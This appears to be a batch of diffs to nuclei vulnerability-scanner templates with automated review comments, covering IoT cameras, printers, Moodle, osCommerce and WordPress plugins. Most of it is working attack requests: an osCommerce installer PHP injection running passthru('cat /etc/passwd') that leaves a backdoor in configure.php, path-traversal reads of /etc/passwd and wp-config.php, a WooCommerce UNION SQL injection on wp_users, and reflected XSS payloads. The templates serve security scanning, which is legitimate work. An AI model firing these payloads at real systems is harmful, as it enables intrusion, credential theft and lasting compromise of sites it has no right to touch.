words:
- 'title">Glances</title>'
- 'glances.config'
- '<glances></glances>'
part: body
condition: and


@ -2,9 +2,10 @@ id: selea-ip-camera
info:
name: Detect Selea Targa IP OCR-ANPR Camera
author: geeknik
description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
description: Various version of the Selea Targa IP OCR-ANPR Camera are vulnerable to an Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure flaw
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
severity: info
tags: iot
tags: iot,selea,targa
requests:
- method: GET
@ -17,6 +18,9 @@ requests:
part: header
words:
- "SeleaCPSHttpServer"
- "selea_httpd"
- "HttpServer/0.1"
condition: or
- type: word
part: body
words:


@ -0,0 +1,19 @@
id: printers-info-leak
info:
name: Unauthorized Printer Access
author: pussycat0x
severity: info
tags: network,iot
reference: https://book.hacktricks.xyz/pentesting/9100-pjl
network:
- inputs:
- data: "@PJL INFO STATUS\n"
host:
- "{{Hostname}}:9100"
matchers:
- type: word
words:
- "CODE="
- "PJL INFO STATUS"
condition: and


@ -5,18 +5,26 @@ info:
author: madrobot
severity: medium
description: Cross-site scripting on Moodle.
reference: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
tags: moodle,xss
requests:
- method: GET
path:
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
- "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '\"};alert(1337);//'
- "<script>alert('XSS')</script>"
part: body
- type: word
part: header
words:
- "text/html"


@ -0,0 +1,42 @@
id: oscommerce-rce
info:
author: Suman_Kar
name: osCommerce 2.3.4.1 - Remote Code Execution
description: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
reference: https://www.exploit-db.com/exploits/50128
severity: high
tags: rce,oscommerce
requests:
- raw:
- |
POST /install/install.php?step=4 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 95
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Content-Type: application/x-www-form-urlencoded
DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
- |
GET /install/includes/configure.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
- type: status
status:
- 200
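Review bot: This template changes target state: by the description's own account the first request injects a PHP payload through `DB_DATABASE` that the installer writes into `includes/configure.php`, so every vulnerable host scanned is left with a persistent `passthru(...)` in its configuration file that anyone can later reach. That consequence should be stated explicitly in `description` (and arguably in `name`) so operators can exclude the template from routine scans, and an unauthenticated remote code execution that writes a backdoor warrants `severity: critical` rather than `high`. A non-destructive pre-check, such as matching the installer page on a plain `GET /install/install.php`, would let the exploit step be opt-in; whether that page is reliably distinguishable needs confirming.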


@ -0,0 +1,23 @@
id: huijietong-cloud-fileread
info:
name: Huijietong Cloud File Read
author: princechaddha
severity: high
tags: huijietong,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
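Review bot: The POST sends a form body `fullPath=/etc/passwd` with no `Content-Type` header; unless nuclei supplies one for `body:` requests, many server frameworks will not parse the parameter and the template silently never matches. Add `headers:` with `Content-Type: application/x-www-form-urlencoded` under the request. The template also has no `description` or `reference`, so a reader cannot tell which product or advisory `fileDownload?action=downloadBackupFile` belongs to.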


@ -0,0 +1,25 @@
id: nativechurch-wp-theme-lfd
info:
name: WordPress NativeChurch Theme Arbitrary File Download
author: 0x_Akoko
severity: high
description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable.
reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
tags: wordpress,wp-theme,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and
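Review bot: The `description` is ungrammatical and does not say what the file parameter does; something like `The download.php script shipped with the NativeChurch WordPress theme (1.0-1.5) passes the file parameter to a file read without path validation, allowing arbitrary file download such as wp-config.php.` states the same thing plainly. The matcher set has no `status` check, which is acceptable here because the four `wp-config.php` markers under `condition: and` are specific enough on their own.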


@ -15,5 +15,12 @@ requests:
matchers:
- type: word
words:
- '{"facebook_urls":[{"<img src=x onerror=alert(document.domain)>":""}],"status":1,"message":{"":{"twitter":0}}}'
part: body
- '[{"<img src=x onerror=alert(document.domain)>":""}]'
- 'facebook'
- 'twitter'
part: body
condition: and
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: wordpress-woocommerce-sqli
info:
name: Unauthenticated SQL injection Woocommerce
author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
severity: critical
tags: wordpress,woocomernce,sqli,wp-plugin
reference: |
- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
requests:
- method: GET
path:
- '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
matchers-condition: and
matchers:
- type: word
words:
- 'sqli-test'
- 'attribute_counts'
condition: and
- type: word
words:
- 'application/json'
part: header
- type: status
status:
- 200
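Review bot: The tag `woocomernce` is misspelled, so `-tags woocommerce` will not select this template; change it to `tags: wordpress,woocommerce,sqli,wp-plugin`. A `description` is missing for a critical-severity template; one sentence saying the injection is in the `calculate_attribute_counts[][taxonomy]` parameter of the Store API `collection-data` route and that the payload only selects the user ID with a `sqli-test` marker would tell operators the request is non-destructive.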


@ -0,0 +1,30 @@
id: wp-custom-tables-xss
info:
name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
reference: https://www.securityfocus.com/bid/54326/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: wp-flagem-xss
info:
name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/38674
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,29 @@
id: wp-nextgen-xss
info:
name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.securityfocus.com/bid/57200/info
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,32 @@
id: wp-slideshow-xss
info:
name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://www.exploit-db.com/exploits/37948
tags: wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200